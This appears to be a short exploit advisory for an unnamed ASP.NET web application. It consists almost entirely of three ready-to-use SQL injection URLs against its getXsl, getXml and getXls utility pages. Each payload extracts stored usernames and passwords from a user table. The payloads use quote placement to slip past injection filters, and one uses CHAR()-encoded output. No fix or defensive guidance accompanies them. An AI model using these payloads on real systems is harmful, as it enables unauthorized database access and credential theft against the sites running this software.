# Original Advisory: http://bugreport.ir/index.php?/42

1. Exploits:
    Note1: Use Internet Explorer (IE) for best result.
    Note2: "'" used to bypass any SQL Injection denier.
    
    1.1. SQL Injection in "/utils/getXsl.aspx" in "xslIdn" parameter.
            -------------
            http://[URL]/utils/getXsl.aspx?xslIdn=-1' union' all' select 'UsrNam%2bUsrPwd' from' [Usr]
            Open downloaded file by notepad.
            -------------
    1.2. SQL Injection in "/utils/getXml.aspx" in "part" parameter.
            -------------
            http://[URL]/utils/getXml.aspx?lnkIdn=-1&part=1 from' 'lnk' 'where' 1='2187 'union' all' 'select' 'UsrNam%2bUsrPwd' from' [Usr]' 'union' all' select' data1' 
            Open downloaded file by notepad.
            -------------
    1.3. SQL Injection in "/utils/getXls.aspx" in "part" parameter.
            -------------
            /utils/getXls.aspx?lnkIdn=-1&part=1 'from 'lnk' 'where' 1='2187 'union' all' 'select' 'CHAR(60)%2bCHAR(116)%2bCHAR(97)%2bCHAR(98)%2bCHAR(108)%2bCHAR(101)%2bCHAR(62)%2bCHAR(60)%2bCHAR(116)%2bCHAR(114)%2bCHAR(62)%2b CHAR(60)%2bCHAR(116)%2bCHAR(100)%2bCHAR(62)%2bUsrNam%2bUsrPwd%2bCHAR(60)%2bCHAR(47)%2bCHAR(116)%2bCHAR(100)%2bCHAR(62)%2b CHAR(60)%2bCHAR(47)%2bCHAR(116)%2bCHAR(114)%2bCHAR(62)%2bCHAR(60)%2bCHAR(47)%2bCHAR(116)%2bCHAR(97)%2bCHAR(98)%2bCHAR(108)%2bCHAR(101)%2bCHAR(62) 'from '[Usr] 'union 'all 'select' data1'
            Open downloaded file by notepad.
            -------------